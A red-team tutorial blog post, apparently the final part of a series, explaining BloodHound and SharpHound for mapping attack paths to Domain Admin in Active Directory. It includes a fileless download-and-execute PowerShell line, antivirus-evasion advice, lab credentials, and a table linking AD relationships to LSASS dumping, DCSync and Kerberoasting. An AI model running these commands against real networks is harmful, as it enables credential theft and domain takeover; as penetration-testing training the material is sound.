Bloodhound: The Map That Shows You How to Own Active Directory
- Tony Kelly
- May 25
- 6 min read
Series: The Community's Red Team
Post: 17 of 17
Tags: bloodhound, active directory, SharpHound, attack paths, AD, tools
Read time: ~13 min
Prerequisites: Post 01 — Methodology Overview, Post 14 — Impacket
Active Directory is a maze. Thousands of users, hundreds of groups, dozens of computers, nested group memberships, ACL permissions, delegation rights, session data — the relationships between AD objects are too complex to map manually and too important to leave unmapped. A user who seems unimportant is three hops from Domain Admin through a chain of permissions that no one thought to audit.
Bloodhound is the tool that draws the map.
It collects AD relationship data, loads it into a graph database, and lets you query it visually. "What's the shortest path from this account to Domain Admins?" is a query result. "Which accounts have DCSync rights?" is a query result. "Where do Domain Admins have active sessions right now?" is a query result. The attack chain that would take hours of manual PowerShell enumeration to find takes thirty seconds in Bloodhound.
This post covers installation, data collection, the queries that matter, and how to read what the graph is telling you.
Installation
Bloodhound requires Neo4j as its graph database backend:
# Install Neo4j
sudo apt install neo4j -y
sudo neo4j start
# First-time setup: browse to http://localhost:7474
# Default credentials: neo4j:neo4j
# You'll be prompted to change the password — do it, you'll need it
Install Bloodhound GUI:
sudo apt install bloodhound -y
bloodhound &
# Login with your Neo4j credentials
If the apt version is outdated, download the latest release directly from the BloodHoundAD GitHub releases page.
Data Collection: SharpHound (Windows)
SharpHound is the data collector. It queries Active Directory, collects relationship data, and produces a ZIP of JSON files for import into Bloodhound.
Run it from a domain-joined Windows host with valid domain credentials (any domain user account is enough):
# Download SharpHound
iwr http://<your_ip>/SharpHound.exe -OutFile SharpHound.exe
# Collect all data types
.\SharpHound.exe -c All
# Target a specific domain
.\SharpHound.exe -c All -d INLANEFREIGHT.LOCAL
# Output to a specific directory
.\SharpHound.exe -c All --OutputDirectory C:\temp
Output is a ZIP file ending in _BloodHound.zip. Transfer it to your attack machine.
In-memory version (no binary on disk)
IEX (New-Object Net.WebClient).DownloadString('http://<your_ip>/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp
Data Collection: bloodhound-python (Linux)
If you don't yet have a Windows foothold but have valid domain credentials, collect from your Linux attack machine:
pip install bloodhound --break-system-packages
bloodhound-python -d INLANEFREIGHT.LOCAL \
-ns 172.16.5.5 \
-c All \
-u forend \
-p Klmcargo2
Produces multiple JSON files. Zip them for clean import:
zip -r bloodhound_data.zip *.json
bloodhound-python is slower and less comprehensive than SharpHound, but it works entirely from Linux without a foothold.
Importing Data
Open Bloodhound GUI
Click Upload Data button (top right area)
Select your ZIP file (or individual JSON files)
Wait for the import — watch the node counters in the top-left increase
Clear old data before re-importing: Database Info panel → Clear Database. Stale data from previous collections will mix with new data and produce confusing results.
The First Queries to Run
As soon as data is imported, run these four queries immediately. They give you the attack landscape before you do anything else.
1. Find Principals with DCSync Rights
Analysis → Find Principals with DCSync Rights
DCSync rights (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All) let an account request any hash from the domain controller as if it were a domain controller itself. Any account with DCSync rights is an immediate path to full domain compromise via impacket-secretsdump.
If any account you've already compromised appears here, you're done.
2. Shortest Paths to Domain Admins
Analysis → Shortest Paths to Domain Admins
This query finds every attack path to Domain Admins across the entire dataset. It shows you what's possible from anywhere in the environment. Even if you haven't compromised a specific account yet, seeing the paths tells you which accounts to prioritize targeting.
3. List All Kerberoastable Accounts
Analysis → List all Kerberoastable Accounts
Service accounts with SPNs. Any account here is a Kerberoasting target — request TGS tickets with impacket-GetUserSPNs and crack them offline with Hashcat mode 13100.
Service accounts often have powerful group memberships that aren't obvious until you see them in the graph.
4. Find Computers Where Domain Users Are Local Admin
Analysis → Find Computers where Domain Users are Local Admin
If domain users are local admins on a machine, any domain account can dump LSASS there. If a Domain Admin has a session on that machine, that's a direct path to DA credentials.
The Workflow: From Owned Account to Domain Admin
As you compromise accounts throughout an engagement, mark them as owned in Bloodhound. This unlocks the most powerful attack path queries.
Right-click any user/computer node → Mark as Owned
Then run:
Analysis → Shortest Paths from Owned Principals to Domain Admins
This query takes every account you've marked as owned and shows every path from your current position to Domain Admins. As you compromise more accounts, the paths get shorter.
Reading the Graph
Node colors
Red — High value target: Domain Admins group, domain controllers, accounts with powerful rights
Yellow — User
Blue — Computer
Green — Group
Purple — GPO
Edge types and exploitation
Each edge type in Bloodhound represents a specific relationship that can be abused. Right-clicking any edge and clicking Help shows the exact PowerView commands to exploit it.
Edge | What it means | How to exploit |
AdminTo | Local admin on machine | Dump LSASS, run CME/psexec |
HasSession | User has active session here | Lateral move to this machine for credential dump |
MemberOf | Group membership | Inherit all group's rights |
GenericAll | Full control of object | Reset password, add to group, Kerberoast |
GenericWrite | Modify object attributes | Set SPN → Kerberoast, set logon script |
ForceChangePassword | Reset password without knowing old | Change it, then use the account |
WriteDACL | Modify permissions on object | Grant yourself GenericAll |
WriteOwner | Change object owner | Make yourself owner → then GenericAll |
GetChanges + GetChangesAll | DCSync rights | impacket-secretsdump → full domain hash dump |
CanPSRemote | WinRM access | evil-winrm -i <computer> -u <user> |
SQLAdmin | MSSQL sysadmin rights | mssqlclient.py → xp_cmdshell |
AllowedToDelegate | Kerberos constrained delegation | Delegation attack for service tickets |
HasSession is gold
The HasSession edge means a user has an active authentication session on a computer. If a Domain Admin has a session on a machine you have local admin on, that machine's LSASS contains the Domain Admin's credentials. Go dump it now.
Analysis → Find Computers where Domain Users are Local Admin
Cross-reference with:
Analysis → Find Computers with Unsupported Operating Systems
Older OS + DA session = high-value target.
Custom Cypher Queries
When the built-in queries don't cover what you need, write your own. Bloodhound uses the Cypher query language (Neo4j):
All paths from a specific user to DA
MATCH (u:User {name:"FOREND@INLANEFREIGHT.LOCAL"}),
(g:Group {name:"DOMAIN ADMINS@INLANEFREIGHT.LOCAL"}),
p=shortestPath((u)-[*1..]->(g))
RETURN p
Find users with WinRM access (CanPSRemote)
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group))
MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer)
RETURN p2
Find users with active DA sessions
MATCH p=(u:User)-[:HasSession]->(c:Computer)
WHERE u.admincount=true
RETURN p
Find all GenericAll relationships
MATCH p=(u:User)-[:GenericAll]->(t)
RETURN p
Common Issues
No paths found to Domain Admins: Collection may have missed some data. Re-run with -c All and ensure SharpHound ran with sufficient privileges. Try "Shortest Paths from Domain Users to DA" for a broader search.
Data looks incomplete: bloodhound-python is less comprehensive than SharpHound. If you have a Windows foothold, always prefer SharpHound.
Neo4j won't start:
sudo neo4j stop && sudo neo4j start
# Check logs: /var/log/neo4j/neo4j.log
SharpHound blocked by AV: Use the PowerShell in-memory version, or run bloodhound-python from Linux.
Graph is too cluttered: Use the edge filtering panel in the left sidebar to show only specific edge types. Filter to AdminTo and HasSession for a clear picture of lateral movement paths.
Quick Reference
# Install
sudo apt install neo4j bloodhound -y
sudo neo4j start
# Collect — Windows (SharpHound)
.\SharpHound.exe -c All
.\SharpHound.exe -c All -d INLANEFREIGHT.LOCAL
# Collect — Linux (bloodhound-python)
bloodhound-python -d <domain> -ns <DC_ip> -c All -u <user> -p <pass>
zip -r data.zip *.json
# Import: Open BloodHound GUI → Upload Data → select ZIP
# Key queries (Analysis tab)
# Find Principals with DCSync Rights
# Shortest Paths to Domain Admins
# List all Kerberoastable Accounts
# Find Computers where Domain Users are Local Admin
# Shortest Paths from Owned Principals to Domain Admins
# Mark as owned
# Right-click user/computer node → Mark as Owned
# Key Cypher — paths from specific user to DA
MATCH (u:User {name:"USER@DOMAIN.LOCAL"}),
(g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}),
p=shortestPath((u)-[*1..]->(g))
RETURN p
Series Complete
You've now covered the full red team methodology from first scan to Active Directory domain compromise. Seventeen posts, seventeen tools, one connected chain:
Nmap → Gobuster + Nikto → Enum4linux → CrackMapExec →
Hydra + Medusa → Hashcat + John → Netcat → Metasploit →
LinPEAS/WinPEAS → Impacket → Chisel + Ligolo-ng → Bloodhound
Every tool has a place in that chain. Every post connects to the ones before and after it. The methodology is the map; the tools are how you move through it.
The exploit only works on the uninformed. Now you're informed.
MeshForge — Training the Community's Red Team
They count on your ignorance. The exploit only works on the uninformed.
Comments